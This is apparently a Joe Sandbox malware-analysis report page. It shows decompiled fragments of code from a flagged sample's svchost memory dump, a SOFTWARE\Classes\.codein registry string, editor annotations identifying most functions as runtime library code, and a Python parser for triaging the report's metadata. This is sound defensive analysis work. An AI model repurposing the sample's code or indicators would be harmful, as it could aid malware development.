                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$CloseCreateEventHandleLibraryLoadSleep
                                                            • String ID: J
                                                            • API String ID: 1447892272-1141589763
                                                            • Opcode ID: 7a68649f046860f5ae64f33c2d75acc6395c4fa0ac2a7ac87a7b2314232dadf9
                                                            • Instruction ID: 57491cc88a70872310e8fe19ad4855bfc8c2cee0f1b75a388a87f9029ce3b2cc
                                                            • Opcode Fuzzy Hash: 7a68649f046860f5ae64f33c2d75acc6395c4fa0ac2a7ac87a7b2314232dadf9
                                                            • Instruction Fuzzy Hash: 18614A37604B40A9EB21CBA4E8A83DD77F4FB84798F500516DA8953BAADF3AC055C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF5513E0(intOrPtr __eax, long long __rbx, intOrPtr* __rcx, long long __rsi) {
                                                            				intOrPtr _t63;
                                                            				intOrPtr _t65;
                                                            				intOrPtr _t66;
                                                            				signed char _t69;
                                                            				intOrPtr _t84;
                                                            				signed long long _t104;
                                                            				intOrPtr* _t108;
                                                            				void* _t121;
                                                            				long long _t125;
                                                            				void* _t127;
                                                            				signed long long _t128;
                                                            
                                                            				_t123 = __rsi;
                                                            				 *((long long*)(_t127 + 0x10)) = __rbx;
                                                            				 *((long long*)(_t127 + 0x18)) = _t125;
                                                            				 *((long long*)(_t127 + 0x20)) = __rsi;
                                                            				_t128 = _t127 - 0x60;
                                                            				_t104 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t128 + 0x50) = _t104 ^ _t128;
                                                            				_t108 = __rcx;
                                                            				__imp__WSAEnumNetworkEvents();
                                                            				_t8 = _t121 + 2; // 0x3
                                                            				_t84 = _t8;
                                                            				if (__eax != 0xffffffff) goto 0xaf551487;
                                                            				__imp__#111();
                                                            				_t69 =  *(_t128 + 0x20);
                                                            				if ((_t69 & 0x00000010) == 0) goto 0xaf55143c;
                                                            				goto 0xaf55145f;
                                                            				if ((_t69 & 0x00000020) == 0) goto 0xaf551448;
                                                            				goto 0xaf55145f;
                                                            				if ((dil & _t69) == 0) goto 0xaf551454;
                                                            				goto 0xaf55145f;
                                                            				_t75 =  !=  ? _t84 : 0;
                                                            				__imp__WSAResetEvent();
                                                            				if (__eax == 0) goto 0xaf551583;
                                                            				 *((intOrPtr*)(__rcx + 0x1c)) =  !=  ? _t84 : 0;
                                                            				 *((intOrPtr*)(__rcx + 0x18)) = 1;
                                                            				 *((intOrPtr*)(__rcx + 0x20)) = __eax;
                                                            				 *((intOrPtr*)(__rcx + 0x24)) = 1;
                                                            				_t106 =  *__rcx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x80))() != 0) goto 0xaf5514b5;
                                                            				if (0 == 0) goto 0xaf55155e;
                                                            				if (( *(_t128 + 0x20) & 0x00000010) == 0) goto 0xaf5514b5;
                                                            				if (E0000022B22BAF551590(__rcx, _t128 + 0x20) == 0) goto 0xaf55155e;
                                                            				if (( *(_t128 + 0x20) & 0x00000001) == 0) goto 0xaf5514f2;
                                                            				if ( *((intOrPtr*)(_t128 + 0x24)) != 0) goto 0xaf5514d8;
                                                            				_t63 = E0000022B22BAF551690(__rcx, __rcx, __rsi, _t121);
                                                            				goto 0xaf5514f2;
                                                            				 *((intOrPtr*)(_t108 + 0x18)) = 1;
                                                            				 *((intOrPtr*)(_t108 + 0x1c)) = 4;
                                                            				 *((intOrPtr*)(_t108 + 0x20)) = _t63;
                                                            				 *((intOrPtr*)(_t108 + 0x24)) = 1;
                                                            				if (0 == 0) goto 0xaf55155e;
                                                            				if (( *(_t128 + 0x20) & 0x00000002) == 0) goto 0xaf551527;
                                                            				if ( *((intOrPtr*)(_t128 + 0x28)) != 0) goto 0xaf551511;
                                                            				_t65 = E0000022B22BAF551870(_t106, _t108, _t108, _t123, _t125);
                                                            				goto 0xaf551527;
                                                            				 *((intOrPtr*)(_t108 + 0x18)) = 1;
                                                            				 *((intOrPtr*)(_t108 + 0x1c)) = _t84;
                                                            				 *((intOrPtr*)(_t108 + 0x20)) = _t65;
                                                            				 *((intOrPtr*)(_t108 + 0x24)) = 1;
                                                            				if (0 == 0) goto 0xaf55155e;
                                                            				if (( *(_t128 + 0x20) & 0x00000020) == 0) goto 0xaf55155e;
                                                            				_t66 =  *((intOrPtr*)(_t128 + 0x38));
                                                            				 *((intOrPtr*)(_t108 + 0x18)) = 1;
                                                            				 *((intOrPtr*)(_t108 + 0x24)) = 1;
                                                            				if (_t66 != 0) goto 0xaf551552;
                                                            				 *((long long*)(_t108 + 0x1c)) = 5;
                                                            				goto 0xaf55155c;
                                                            				 *((intOrPtr*)(_t108 + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(_t108 + 0x20)) = _t66;
                                                            				return E0000022B22BAF55A7C0(_t69, _t106,  *(_t128 + 0x50) ^ _t128);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnumErrorEventEventsLastNetworkReset
                                                            • String ID:
                                                            • API String ID: 1050048411-3916222277
                                                            • Opcode ID: cf3fa6a3abd49a5a6800dd728abcb26caff2efb20de1f617484818b19025fff6
                                                            • Instruction ID: 10602093fc53aa8288770fbd1b2e21f810077ebb3af944f912556dc3f52c9716
                                                            • Opcode Fuzzy Hash: cf3fa6a3abd49a5a6800dd728abcb26caff2efb20de1f617484818b19025fff6
                                                            • Instruction Fuzzy Hash: EE516B73604A44A7F7768FA5D40C39E7BE1F788B58F160214DA8A4739ADFBAC8458B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF540890(long long* __rax, void* __rcx) {
                                                            
                                                            				if ( *((intOrPtr*)(__rcx + 0x40)) == 0) goto 0xaf5408d1;
                                                            				if ( *((intOrPtr*)(__rcx + 0x34)) != 2) goto 0xaf5408c6;
                                                            				if ( *((intOrPtr*)(__rcx + 0x48)) == 0) goto 0xaf5408c6;
                                                            				E0000022B22BAF53F560( *((intOrPtr*)(__rcx + 0x48)), "dbug");
                                                            				if (__rax == 0) goto 0xaf5408c6;
                                                            				 *__rax();
                                                            				return 1;
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID: conf$dbug$init
                                                            • API String ID: 2422867632-3701578037
                                                            • Opcode ID: 67ffc1cac0ceb5912aaaa8b724a9adde4b89fd8ba9e28160c56a2a9c3b9ca292
                                                            • Instruction ID: a61f1928e7a430d0747e5fd74bcf6a71a8edcb4d10536dc7a631f3239d3ede24
                                                            • Opcode Fuzzy Hash: 67ffc1cac0ceb5912aaaa8b724a9adde4b89fd8ba9e28160c56a2a9c3b9ca292
                                                            • Instruction Fuzzy Hash: 76416033601A00A6EA76EB9AF15D3DA73F1EB44B91F144025DB4D5B7A2DF3AC892C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

C-Code - Quality: 27%
// Editor's annotation; the decompiler output below is kept as the report emitted it
// (the ?? arguments are values the decompiler could not recover). The routine is a
// text-mode writer: it walks a UTF-16 buffer (__r8 up to _t103), copies it into the
// stack buffer _a40.._a1744 turning every 0x0a (LF) into 0x0d 0x0a (CR LF), converts
// the filled buffer with WideCharToMultiByte into a 0xd55-byte narrow buffer (_a1752)
// and hands the result to WriteFile. A failed conversion or write ends with
// GetLastError() stored in *__rcx; on the success path __rcx[1] is updated with a
// byte count (__edi - r15d). The (__edx >> 6) * 8 table lookup and the & 0x3f mask are
// the CRT's __pioinfo indexing of a C file descriptor, so __edx is the fd and the
// function is consistent with the UCRT lowio text-mode write path rather than
// sample-specific logic. _t61 ^ ... is the /GS stack cookie load and check.
E0000022B22BAF576404(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
    intOrPtr _v0;
    signed long long _v8;
    int _t33;
    void* _t39;
    signed int _t40;
    int _t49;
    signed long long _t61;
    short* _t66;
    signed int* _t67;
    void* _t83;
    void* _t90;
    void* _t96;
    void* _t99;
    void* _t102;
    void* _t103;

    _a8 = __rbx;
    _a24 = __rbp;
    E0000022B22BAF5781B0(_t39, __rax, __rcx, _t83, __r8, _t96, _t99);
    _t61 =  *0xaf595008; // 0x486b4b98dc9d  (security cookie)
    _a5176 = _t61 ^ _t90 - __rax;
    r14d = r9d;
    r10d = r10d & 0x0000003f;            // fd & 0x3f: index within a __pioinfo block
    _t103 = _t102 + __r8;                // end of the wide-character input
     *__rcx =  *__rcx & 0x00000000;
    __rcx[1] =  *((intOrPtr*)(0xaf599790 + (__edx >> 6) * 8));   // __pioinfo[fd >> 6]
    if (__r8 - _t103 >= 0) goto 0xaf576547;   // nothing to write
    _t66 =  &_a40;                       // start of the CR/LF-expanded stack buffer
    if (__r8 - _t103 >= 0) goto 0xaf5764af;   // input exhausted: flush
    _t40 =  *__r8 & 0x0000ffff;
    if (_t40 != 0xa) goto 0xaf57649b;    // not LF: copy as is
     *_t66 = 0xd;                        // LF: emit CR first
    _t67 = _t66 + 2;
     *_t67 = _t40;
    if ( &(_t67[0]) -  &_a1744 < 0) goto 0xaf57647d;   // buffer not full: next char
    _a16 = _a16 & 0x00000000;
    _a8 = _a8 & 0x00000000;
    _v0 = 0xd55;                         // size of the narrow output buffer
    _v8 =  &_a1752;
    r9d = 0;
    _t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
    _t49 = _t33;
    if (_t33 == 0) goto 0xaf57653f;      // conversion failed
    if (_t33 == 0) goto 0xaf57652f;
    _v8 = _v8 & 0x00000000;
    r8d = _t49;
    r8d = r8d;
    if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xaf57653f;   // write failed
    if (0 + _a24 - _t49 < 0) goto 0xaf5764fc;                  // short write
    __rcx[1] = __edi - r15d;
    goto 0xaf576472;                     // back to the outer loop
     *__rcx = GetLastError();            // error path: record the Win32 error
    return E0000022B22BAF55A7C0(0, __rcx, _a5176 ^ _t90 - __rax);   // cookie check
}
Instruction addresses for the listing above: 0x22baf576404 to 0x22baf576575 (the report's side column, one address per decompiled statement, is collapsed to its range here).

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: U
• API String ID: 2456169464-4171548499
• Opcode ID: e0c28abbd6a968b68e3e1d38b02201de836fca2a953810b05ad8378aa4e01fec
• Instruction ID: 504b8d38489d834855236873171ff337f373c8d0361f598650876d4bca456db4
• Opcode Fuzzy Hash: e0c28abbd6a968b68e3e1d38b02201de836fca2a953810b05ad8378aa4e01fec
• Instruction Fuzzy Hash: F841A223725A80A6EB218FA6F44C7EA77A1F788B94F844421EE4D87799DF3DC441CB40
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 51%
// Editor's annotation; decompiler output kept as emitted (?? = unrecovered
// arguments). This is not sample logic but the MSVC C++ exception runtime's
// catch-block epilogue. The tests *_t63 == 0xe06d7363 (the C++ exception code;
// its little-endian bytes are the "csm" string the report lists for this
// function), NumberParameters (+0x18) == 4 and magic (+0x20) - 0x19930520 <= 2 are
// the CRT's check that an EXCEPTION_RECORD is one of its own. Matching the
// report's API ID, E0000022B22BAF563AB8 is most likely __vcrt_getptd_noexit
// (per-thread data), E0000022B22BAF578B28 __DestructExceptionObject, and
// E0000022B22BAF578814 the check on the thrown object pointer
// (ExceptionInformation[1] at +0x28) that decides whether it may be destroyed;
// RaiseException covers the rethrow path. The final store of 0xfffffffe (-2)
// through the frame's unwind-help slot marks the try state as fully unwound.
// Treat this function as library code.
E0000022B22BAF57994E(void* __rax, void* __rbx, intOrPtr _a32, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56, long long _a64, intOrPtr* _a80, intOrPtr _a176, intOrPtr* _a184, long long _a192, intOrPtr _a200) {
    void* _t35;
    intOrPtr _t49;
    intOrPtr* _t63;

    _a32 = 1;
    E0000022B22BAF563AB8(__rax);
     *(__rax + 0x40) =  *(__rax + 0x40) & 0x00000000;
    _t63 = _a184;                        // EXCEPTION_RECORD of the caught exception
    if (_a176 == 0) goto 0xaf579992;
    E0000022B22BAF578B28(1, __rbx, _t63);
    _t49 = _a200;
    r8d =  *((intOrPtr*)(_t49 + 0x18));
    goto 0xaf57999f;
    r8d =  *((intOrPtr*)(_t63 + 0x18));
    RaiseException(??, ??, ??, ??);      // rethrow
    r15d = _a32;
    E0000022B22BAF578794(_t49, _a40, _a56);
    if (r15d != 0) goto 0xaf579a05;
    if ( *_t63 != 0xe06d7363) goto 0xaf579a05;                      // ExceptionCode
    if ( *((intOrPtr*)(_t63 + 0x18)) != 4) goto 0xaf579a05;         // NumberParameters
    if ( *((intOrPtr*)(_t63 + 0x20)) - 0x19930520 - 2 > 0) goto 0xaf579a05;   // EH magic
    if (E0000022B22BAF578814(_t49,  *((intOrPtr*)(_t63 + 0x28))) == 0) goto 0xaf579a05;
    E0000022B22BAF578B28(1, _a40, _t63);  // destroy the exception object
    E0000022B22BAF563AB8(_t49);
     *((long long*)(_t49 + 0x20)) = _a192;
    _t35 = E0000022B22BAF563AB8(_t49);
     *((long long*)(_t49 + 0x28)) = _a64;
     *((long long*)( *((intOrPtr*)(_a48 + 0x1c)) +  *_a80)) = 0xfffffffe;   // unwind help = -2
    return _t35;
}
Instruction addresses for the listing above: 0x22baf57994e to 0x22baf579a3d (the report's side column, one address per decompiled statement, is collapsed to its range here).

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
• String ID: csm
• API String ID: 2280078643-1018135373
• Opcode ID: f795676adab844364cbbdec4aadcf85fb7ae3005bb5634ee2150d941269cf22d
• Instruction ID: 47136862164bcd4d2a761679d9ba7f80e598c32839f3abf9fdd57a1189b13dd8
• Opcode Fuzzy Hash: f795676adab844364cbbdec4aadcf85fb7ae3005bb5634ee2150d941269cf22d
• Instruction Fuzzy Hash: A5215C3720068096EA71DF96E04879EB7A0F389BA5F055601DE9A03796DF3AD886CB10
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Monitor$DisplayEnumFromInfoSettingsWindow
• String ID: h
• API String ID: 2498085031-2439710439
• Opcode ID: a9248070bc806020c395ec4d2972dd80648afb6a2d026f0d11748e547005f718
• Instruction ID: 31d4ed014b61c2e5799c71eaa48785013496274d2b2505d9ef767dad17cd4eae
• Opcode Fuzzy Hash: a9248070bc806020c395ec4d2972dd80648afb6a2d026f0d11748e547005f718
• Instruction Fuzzy Hash: 6411CD33A04A849BD772CF75E00938EB3A1F789780F408226DB691374ADF3AD456CB10
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 45%
// Editor's annotation; decompiler output kept as emitted (?? = unrecovered
// arguments). A constructor-style initialiser for the object at __rcx: it creates
// two event objects with CreateEventW (r8d = r9d = 0 are bManualReset and
// bInitialState, so both are auto-reset and start non-signalled), stores a 1000 ms
// (0x3e8) value at +8, and fills a packed record at +0x82..+0x95 with fixed
// constants (0x10031, 0x1f40, 0x659, 0x41, 0x1400002) whose meaning the report
// does not establish. The value 0xaf586050 is written into several slots; whether
// these are one shared pointer or distinct addresses the decompiler rendered
// identically cannot be settled from this listing, so do not read it as a single
// vtable.
E0000022B22BAF531260(void* __eflags, long long __rbx, long long* __rcx, long long __rdi, long long __rsi) {
    void* _t45;
    long long* _t50;
    long long* _t56;
    long long _t62;
    void* _t64;
    struct _SECURITY_ATTRIBUTES* _t67;

    _t45 = __eflags;
     *((long long*)(_t64 + 8)) = __rbx;
     *((long long*)(_t64 + 0x10)) = _t62;
     *((long long*)(_t64 + 0x18)) = __rsi;
     *((long long*)(_t64 + 0x20)) = __rdi;
    _t50 = __rcx;
     *__rcx = 0xaf586050;
    r9d = 0;                             // bInitialState = FALSE
    r8d = 0;                             // bManualReset = FALSE
    CreateEventW(_t67, ??, ??);          // first event
    r9d = 0;
    r8d = 0;
     *((long long*)(__rcx + 0x40)) = 0xaf586050;
    CreateEventW(??, ??, ??, ??);        // second event
     *((intOrPtr*)(__rcx + 8)) = 0x3e8;  // 1000 (ms timeout, by value)
     *((long long*)(__rcx + 0x48)) = 0xaf586050;
    _t56 = __rcx + 0x58;
     *((long long*)(__rcx + 0x50)) = _t62;
     *((long long*)(__rcx + 0x38)) = _t62;
     *((short*)(__rcx + 0x80)) = 0;
    E0000022B22BAF55A828(0,  *((intOrPtr*)(__rcx + 8)));
     *((long long*)(_t56 - 0x48)) = 0xaf586050;
    E0000022B22BAF55A7EC(0xaf586050,  *((intOrPtr*)(__rcx + 8)));
     *_t56 = 0xaf586050;
    E0000022B22BAF55A828(0,  *((intOrPtr*)(_t50 + 8)));
     *((long long*)(_t56 - 0x38)) = 0xaf586050;
    E0000022B22BAF55A7EC(0xaf586050,  *((intOrPtr*)(_t50 + 8)));
     *((long long*)(_t56 + 0x10)) = 0xaf586050;
    if (_t45 != 0) goto 0xaf5312d0;
     *((long long*)(_t50 + 0x82)) = 0xaf586050;
     *((long long*)(_t50 + 0x8a)) = 0xaf586050;
     *((long long*)(_t50 + 0x8e)) = 0x41;
     *((intOrPtr*)(_t50 + 0x92)) = 0x1400002;
     *((intOrPtr*)(_t50 + 0x82)) = 0x10031;
     *((intOrPtr*)(_t50 + 0x86)) = 0x1f40;
     *((intOrPtr*)(_t50 + 0x8a)) = 0x659;
    return 0;
}
Instruction addresses for the listing above: 0x22baf531260 to 0x22baf53136f (the report's side column, one address per decompiled statement, is collapsed to its range here).

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: CreateEvent
• String ID: 1$A
• API String ID: 2692171526-719046165
• Opcode ID: d0a89945a4dfec4dc7c7752293a85f15a975431378bda52a400bb942abf87683
• Instruction ID: 54308780df568dc9d6474f1499b5c44bb3f1fbcaba86b5aebb3937e8a6b650ee
• Opcode Fuzzy Hash: d0a89945a4dfec4dc7c7752293a85f15a975431378bda52a400bb942abf87683
• Instruction Fuzzy Hash: 71215733600B8096E725CFB1E44938E33B8F748B48F448029DB889BB5ADF79C465C744
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Open$Close
• String ID: SOFTWARE\Classes\.codein
• API String ID: 3083169812-3041101089
• Opcode ID: 483133b999c18be68aa19b572519b3e79d78ae31d44a88618e419bfde116a11d
• Instruction ID: 9e67a46dcdee4d8c4fc96a0aa71d34b94b054a3e09171151727c8b9400276bad
• Opcode Fuzzy Hash: 483133b999c18be68aa19b572519b3e79d78ae31d44a88618e419bfde116a11d
• Instruction Fuzzy Hash: 94F06236714B91E2DB614BA9F84D7867364F780794F800211EE6C42BA9EF2EC119CB00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: 3a1fed655c33226568eb5ac8b2742cfa3bc95c78cd58555e1ff07cc808341662
• Instruction ID: d4c72c873738643c4ce64c49fbd9756b9eab7ef68f6c94181f5b3cff578bdde7
• Opcode Fuzzy Hash: 3a1fed655c33226568eb5ac8b2742cfa3bc95c78cd58555e1ff07cc808341662
• Instruction Fuzzy Hash: 3DF01232618A4092EE72AB94F84A29A73A1F788701F904125E6CE82669DF3DC555C700
Uniqueness
Uniqueness Score: -1.00%
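Every function in this report carries the same metadata block: the Source File line with the dump's load offset, the Snapshot File, the "$"-joined API ID and String ID, the API String ID, and the fuzzy hashes. The following is an added example written by the editor of this page; it is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses such blocks into records and applies a few triage heuristics that are the editor's assumptions (registry paths, GetProcAddress-style import resolution, MSVC exception-runtime code). The sample input is a constructed excerpt of three blocks from this page.

```python
"""Parse Joe Sandbox per-function metadata blocks into records (editor's example).

Not part of the Joe Sandbox report or tooling.  Assumes only the layout seen on
this page: '• Key: Value' bullets opened by a 'Source File' line and closed by a
'Uniqueness Score' line, optionally preceded by 'C-Code - Quality: NN%' for the
decompiled listing of the same function.  flag_record() holds the editor's own
triage heuristics, not anything Joe Sandbox computes.  SAMPLE is a constructed
excerpt of three blocks from this report.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
C-Code - Quality: 51%
Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
• String ID: csm
• API String ID: 2280078643-1018135373
• Instruction Fuzzy Hash: A5215C3720068096EA71DF96E04879EB7A0F389BA5F055601DE9A03796DF3AD886CB10
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
• API ID: Open$Close
• String ID: SOFTWARE\\Classes\\.codein
• API String ID: 3083169812-3041101089
• Instruction Fuzzy Hash: 94F06236714B91E2DB614BA9F84D7867364F780794F800211EE6C42BA9EF2EC119CB00
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Instruction Fuzzy Hash: 3DF01232618A4092EE72AB94F84A29A73A1F788701F904125E6CE82669DF3DC555C700
Uniqueness Score: -1.00%
"""

BULLET = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
QUALITY = re.compile(r"^\s*C-Code - Quality:\s*(\d+)%")
UNIQUENESS = re.compile(r"^\s*Uniqueness Score:\s*(-?[\d.]+)%")
SOURCE = re.compile(r"^(?P<dump>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
FIELDS = {"Snapshot File": "snapshot", "API String ID": "api_string_id",
          "Instruction Fuzzy Hash": "insn_fuzzy"}


@dataclass
class FunctionRecord:
    dump: str = ""                 # memory dump the function was lifted from
    offset: int = 0                # load address of that dump
    based_on_pe: bool = False
    snapshot: str = ""             # IDA snapshot (.jbxd) holding the listing
    apis: list = field(default_factory=list)     # '$'-separated API ID tokens
    strings: list = field(default_factory=list)  # '$'-separated String ID tokens
    api_string_id: str = ""
    insn_fuzzy: str = ""           # instruction fuzzy hash, for cross-report clustering
    quality: Optional[int] = None  # decompiler quality %, if a listing precedes the block
    uniqueness: Optional[float] = None


def parse_blocks(text: str) -> list:
    """Scan report text; decompiled code, pane labels and address columns are skipped."""
    records, cur, pending_quality = [], None, None
    for line in text.splitlines():
        if m := QUALITY.match(line):
            pending_quality = int(m.group(1))
        elif (m := UNIQUENESS.match(line)) and cur is not None:   # closes the record
            cur.uniqueness = float(m.group(1))
            cur.quality, pending_quality = pending_quality, None
            records.append(cur)
            cur = None
        elif m := BULLET.match(line):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":                                # opens a record
                cur = FunctionRecord()
                if s := SOURCE.match(value):
                    cur.dump, cur.offset = s["dump"], int(s["off"], 16)
                    cur.based_on_pe = s["pe"] == "true"
            elif cur is not None and key in ("API ID", "String ID"):
                setattr(cur, "apis" if key == "API ID" else "strings", value.split("$"))
            elif cur is not None and key in FIELDS:
                setattr(cur, FIELDS[key], value)
    if cur is not None:                       # block cut off before its score line
        records.append(cur)
    return records


def flag_record(rec: FunctionRecord) -> list:
    """Triage hints (editor's assumptions): which blocks are worth pivoting on."""
    reasons = []
    if any(s.upper().startswith("SOFTWARE\\") for s in rec.strings):
        reasons.append("registry path: " + ", ".join(rec.strings))
    dlls = [s for s in rec.strings if s.lower().endswith(".dll")]
    if dlls and any("Proc" in a or "Library" in a for a in rec.apis):
        exports = [s for s in rec.strings if s not in dlls]
        reasons.append(f"runtime import resolution: {'/'.join(dlls)} -> {'/'.join(exports)}")
    if "csm" in rec.strings and any("Exception" in a for a in rec.apis):
        # 'csm' is the little-endian text of the MSVC C++ exception code 0xe06d7363
        reasons.append("MSVC C++ EH runtime code (likely library, deprioritise)")
    return reasons
```

The Offset in each Source File line is the load address of the dump, and the E0000022B22BAF... prefix of every function name is an absolute address inside it, so the RVA to look up in the static sample is the address minus 0x22BAF530000 (0x46404 for E0000022B22BAF576404). Grouping records by insn_fuzzy across reports is the usual way to spot code shared between samples, which is why the parser keeps that hash rather than the per-function Opcode ID.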

C-Code - Quality: 15%
// Editor's annotation; decompiler output kept as emitted (?? = unrecovered
// arguments; the listing is cut off at this point in the report and is left so).
// A dispatch wrapper: if the field at __rcx+0x10 is zero it calls the virtual
// method at vtable+0x1d8 directly. Otherwise, when __rdx is a context whose +0x40
// field is set, it enters a critical section, calls the same method, leaves the
// section and atomically decrements the reference count at +0x44 (lock xadd).
// If that count was 1 (now 0) and E0000022B22BAF54FD40 returns 0, the context is
// released with HeapFree. The "== ? 0x90 : 0x68" ternary is a condition the
// decompiler lost; it selects between two offsets, presumably the address of the
// critical section passed to EnterCriticalSection.
E0000022B22BAF556020(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
    signed int _t21;
    void* _t27;
    long long _t65;
    void* _t68;
    void* _t69;
    long _t75;

     *((long long*)(_t68 + 0x18)) = __rsi;
     *((long long*)(_t68 + 0x20)) = __rdi;
    _t69 = _t68 - 0x20;
     *((long long*)(_t69 + 0x38)) = _t65;
    if ( *((intOrPtr*)(__rcx + 0x10)) != 0) goto 0xaf55606b;   // locked path
    SetLastError(_t75);
    r9d =  *((intOrPtr*)(__r8 + 0x30));
     *((intOrPtr*)( *__rcx + 0x1d8))();   // direct virtual call, no lock
    goto 0xaf5560cc;
    if (__rdx == 0) goto 0xaf5560cc;
    if ( *((intOrPtr*)(__rdx + 0x40)) == 0) goto 0xaf5560cc;
     *((long long*)(_t69 + 0x30)) = __rbx;
    _t27 =  ==  ? 0x90 : 0x68;          // condition not recovered by the decompiler
    EnterCriticalSection(??);
    if ( *((intOrPtr*)(__rdx + 0x40)) == 0) goto 0xaf5560be;   // re-check under the lock
    SetLastError(??);
    r9d =  *((intOrPtr*)(__r8 + 0x30));
    _t21 =  *((intOrPtr*)( *__rcx + 0x1d8))();   // same virtual call, now locked
    LeaveCriticalSection(??);
    asm("lock xadd [edi+0x44], eax");   // atomic decrement of the refcount at +0x44
    if ((_t21 | 0xffffffff) != 1) goto 0xaf556103;   // previous value != 1: still referenced
    if (E0000022B22BAF54FD40( *((intOrPtr*)(_t69 + 0x30)), __rcx + 0x100, __r8) != 0) goto 0xaf556103;
    HeapFree(??, ??, ??);               // last reference gone: release the context
    return _t21;
			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterFreeHeapLeave
                                                            • String ID:
                                                            • API String ID: 132096965-0
                                                            • Opcode ID: efe496b2c1ba782f518c328a89f63070b670fd06deedf763cef302dfa826861c
                                                            • Instruction ID: 618835895ea71aab104f591146f90ac1ac7caf14c82e37a127c0d5f93c721a19
                                                            • Opcode Fuzzy Hash: efe496b2c1ba782f518c328a89f63070b670fd06deedf763cef302dfa826861c
                                                            • Instruction Fuzzy Hash: 0E216032200A8097EB65CB66E55C3AD77A0FB88FD4F185121DE0A53BA6CF3AD855C740
                                                            Uniqueness

